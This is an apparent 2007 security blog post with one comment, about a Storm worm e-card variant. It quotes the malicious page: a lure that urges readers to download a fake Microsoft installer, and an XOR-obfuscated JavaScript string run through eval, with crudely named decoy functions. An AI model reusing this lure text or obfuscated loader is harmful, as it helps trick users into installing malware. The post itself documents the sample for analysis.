Ecard Worm is using “function kaspersky(suck,dick){};”

This time ecard aka storm worm variant defined two function in the encoded java script. Just see the encoded Java Script..

“To view your ecard, you need to have Microsoft Data Access installed on your computer.<br> To obtain a free copy of Microsoft Data Access, please <a href=”/msdataaccess.exe”>click here</a>.<div id=”mydiv”></div><Script Language=’JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = “”; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){};var plain_str = “\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57”; var xored_str = xor_str(plain_str, 93); eval(xored_str); </script>

This entry was posted on August 15, 2007 at 9:59 am and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

One Response to “Ecard Worm is using “function kaspersky(suck,dick){};””

Hans Henrik Says:
January 11, 2008 at 3:14 pm

LoL… and what the heck is the function of “kaspersky suck dick”????
and..
\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57
Looks like a perl-code, not a java-code… lolz

Reply

K\’LL3r